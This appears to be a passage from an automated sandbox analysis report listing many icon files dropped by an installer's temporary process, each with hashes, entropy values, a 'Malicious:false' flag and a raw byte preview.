                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):6.0320556453234735
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:9C4c77Xlnvx3vIrhdu95k8e00PK5Qw9hN51sEUqK4hlEVnNApv1k8Z5RWVG4444M:44I7X9Zft0P0r+oh/wVnQv3RWVtrQbe
                                                                                                                                                                                                                                                          MD5:AC6FE311F112F577F6A7108D053180ED
                                                                                                                                                                                                                                                          SHA1:AEA6C67AE58A4B0452BBC37170A2F8C948ADE5C1
                                                                                                                                                                                                                                                          SHA-256:5AC764E501C1968A766B7DDCAF3407F25E212EB3E1147D1DF3B34336A511E63F
                                                                                                                                                                                                                                                          SHA-512:A7EFD0FEED7C54DC5756265936AB2E091F2465AE73F4C7A5254AECDA3B02291343822F22FA61399F91B35762655B26D8FB479492561CAEA5F39F33FBE0178281
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .............................eee.```.nnn.jjj+lll;mmmClllEjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGlllEmmmCkkk;kkk-jjj.ooo.```.....nnn.rrr.kkk%kkkGkkkcmmmukkk.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.mmm.lllwmmmckkkGnnn'kkk.mmm.lll.lll#mmmMmmmw.i\..gP.gL.iN.iN.jO.kO.lO.mP.mQ.nR.pR.qS.rS.qR.pR.nR.mQ.mP.kO.kO.jO.iQ.j\.lllwkkkMhhh%qqq.jjj.lll;rkhw.dI...................................................................gJ.tjf{lll=mmm.jjj!lllQ.cH.a>.....d..nK..jE..jF..lF..mG..nH..oI..qJ..rJ..sK..sK..vN..wN..vN..uM..sL..pJ..nH..nG..pL..d.....e@..eH.mmmQmmm!iii).fY.._=.....vV..c?..e@..fA..gA..hB..jC..kD..lD..mE..nF..oF..k@.....................}..d;..iC..hB..gA..wV.....c?..gV.mmm)mmm-.aI......e..b>..c?..d@..e@..gA..hB..iC..jC..kD..lE..mE..mE..h?.........................b9..iC..hB..fA..e@..d.....dI.lll+kkk-._D.....mM..a>..b>..d?..e@..fA..gA..h
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.288019933532579
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:OjwqZN3wbSWxcd+/da0jaP77C9AVM24KveTySDQF:OjwqZNAbSWxcIOvCWe2SY
                                                                                                                                                                                                                                                          MD5:D3C536BA60769EC6301D00AA3EF5E2EE
                                                                                                                                                                                                                                                          SHA1:5896533F46A247CE288CDC2268ED7C90F5AFC433
                                                                                                                                                                                                                                                          SHA-256:828C41C37260041061C57765B8316A30768306AAA829815F25AB7FE5FB9955C2
                                                                                                                                                                                                                                                          SHA-512:9BA9C36F464D2C260215A765DAF67E789B09EBEC484000037EE394277419692B85497ED4643B6770A5FCB641363FE05DBF15F33C6DF56C46837DEE5DAB8BA7AF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ................................................................................................................................................................................................................................................................................................................[.......................k.k........................................................[...................................-............................................6.6.,.,.*.*.&.&."."....................................-................................................g...A...1...,...>...o.......q.q.'.'.).).%.%.!.!........................................................[................U...<...:...3...+...$......................&.&.).).%.%. . ................................[................................]...O...H...A...9...2...*...#...........'.......~.~.+.+.(.(.$.$. . .............................................................N...V...O...G...@.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.977825738278547
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:hszWWWWWWWWWWWWWWWWWWWWWWWWWWWWxDrsAC/nqfyS:hszWWWWWWWWWWWWWWWWWWWWWWWWWWWWF
                                                                                                                                                                                                                                                          MD5:013FF196FE6FA64188221F539A0C75FA
                                                                                                                                                                                                                                                          SHA1:167852F22EEC0C7CD621ECB343DF0F05A855343E
                                                                                                                                                                                                                                                          SHA-256:27B388961D008A5B3085B27942F398021EC73D57549EA62EFF9D1D9542A8C4AD
                                                                                                                                                                                                                                                          SHA-512:046BE975703A10D75ED67D7C71EC87E63F2FD1CE8915521BD30629B6A4A06E3D10EA646B4ADE10F2D8ECC9297FB5165741E1AD4BDB961669CE66E19B80EBCE61
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .................................|...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...}...............y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y...y.......|...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...}...v...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...v...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...u...r...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...o...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...p...m...n...n...n...n...n...n...n...n...p.....
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.288019933532579
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:OjwqZN3wbSWxcd+/da0jaP77C9AVM24KveTySDQF:OjwqZNAbSWxcIOvCWe2SY
                                                                                                                                                                                                                                                          MD5:D3C536BA60769EC6301D00AA3EF5E2EE
                                                                                                                                                                                                                                                          SHA1:5896533F46A247CE288CDC2268ED7C90F5AFC433
                                                                                                                                                                                                                                                          SHA-256:828C41C37260041061C57765B8316A30768306AAA829815F25AB7FE5FB9955C2
                                                                                                                                                                                                                                                          SHA-512:9BA9C36F464D2C260215A765DAF67E789B09EBEC484000037EE394277419692B85497ED4643B6770A5FCB641363FE05DBF15F33C6DF56C46837DEE5DAB8BA7AF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ................................................................................................................................................................................................................................................................................................................[.......................k.k........................................................[...................................-............................................6.6.,.,.*.*.&.&."."....................................-................................................g...A...1...,...>...o.......q.q.'.'.).).%.%.!.!........................................................[................U...<...:...3...+...$......................&.&.).).%.%. . ................................[................................]...O...H...A...9...2...*...#...........'.......~.~.+.+.(.(.$.$. . .............................................................N...V...O...G...@.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0497425098377073
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:lLkTTTTTTTTTTTTTTTTTTTuTTTTTTTTTTTTTTTTTTTTTTTTTT/TTTTTTTTTTTTTt:J4Osj4
                                                                                                                                                                                                                                                          MD5:BF35CDB2F5E57DDFC543AF37943A1077
                                                                                                                                                                                                                                                          SHA1:0CF4E53B9B623BEF1E52BDEFCD31D155EAA4C9C2
                                                                                                                                                                                                                                                          SHA-256:82803689C06BF4D08AA1852D2C5CD3CE08258C828F12DF85C56BB6FC21A8E835
                                                                                                                                                                                                                                                          SHA-512:60CC6A06BD361CFD73D696717225CDB3B57278840606558D1B65390B531A590BDF08B2CB147B3159529DBB30D5C953C693E663D7E589B1E03756121EC3040199
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$$.........$.......5...<...C...G...K...O...S...S...P...N...K...E...>...7...0...#.......................................Q..........................................................................................................T...............|...................................................................................................................|..............................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):6.0320556453234735
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:9C4c77Xlnvx3vIrhdu95k8e00PK5Qw9hN51sEUqK4hlEVnNApv1k8Z5RWVG4444M:44I7X9Zft0P0r+oh/wVnQv3RWVtrQbe
                                                                                                                                                                                                                                                          MD5:AC6FE311F112F577F6A7108D053180ED
                                                                                                                                                                                                                                                          SHA1:AEA6C67AE58A4B0452BBC37170A2F8C948ADE5C1
                                                                                                                                                                                                                                                          SHA-256:5AC764E501C1968A766B7DDCAF3407F25E212EB3E1147D1DF3B34336A511E63F
                                                                                                                                                                                                                                                          SHA-512:A7EFD0FEED7C54DC5756265936AB2E091F2465AE73F4C7A5254AECDA3B02291343822F22FA61399F91B35762655B26D8FB479492561CAEA5F39F33FBE0178281
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .............................eee.```.nnn.jjj+lll;mmmClllEjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGjjjGlllEmmmCkkk;kkk-jjj.ooo.```.....nnn.rrr.kkk%kkkGkkkcmmmukkk.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.lll.mmm.lllwmmmckkkGnnn'kkk.mmm.lll.lll#mmmMmmmw.i\..gP.gL.iN.iN.jO.kO.lO.mP.mQ.nR.pR.qS.rS.qR.pR.nR.mQ.mP.kO.kO.jO.iQ.j\.lllwkkkMhhh%qqq.jjj.lll;rkhw.dI...................................................................gJ.tjf{lll=mmm.jjj!lllQ.cH.a>.....d..nK..jE..jF..lF..mG..nH..oI..qJ..rJ..sK..sK..vN..wN..vN..uM..sL..pJ..nH..nG..pL..d.....e@..eH.mmmQmmm!iii).fY.._=.....vV..c?..e@..fA..gA..hB..jC..kD..lD..mE..nF..oF..k@.....................}..d;..iC..hB..gA..wV.....c?..gV.mmm)mmm-.aI......e..b>..c?..d@..e@..gA..hB..iC..jC..kD..lE..mE..mE..h?.........................b9..iC..hB..fA..e@..d.....dI.lll+kkk-._D.....mM..a>..b>..d?..e@..fA..gA..h
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.713510909371912
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:+bQZkzhN60+qAWGgEoP30eRH4VAIEftmtCCPV7VrllypoC:z6N6/WGChsKUtHVH4poC
                                                                                                                                                                                                                                                          MD5:9D7DB8AFD191BC67C9E410619010B1CB
                                                                                                                                                                                                                                                          SHA1:19B0D0D72B3656FEE507E633739CF71B3FD642E9
                                                                                                                                                                                                                                                          SHA-256:1A27BB476C1E83AFF622369138CA27B866B6D7865A35E021A0985FA3CCB023A3
                                                                                                                                                                                                                                                          SHA-512:98D3105521E6E5625FF8E822A327455624395347C5CB5736720164078842E84411531BE03C3C59166DA8F5EB3A682EA5D0BCF6F74C97E9DE61EE4505BF19FDD2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
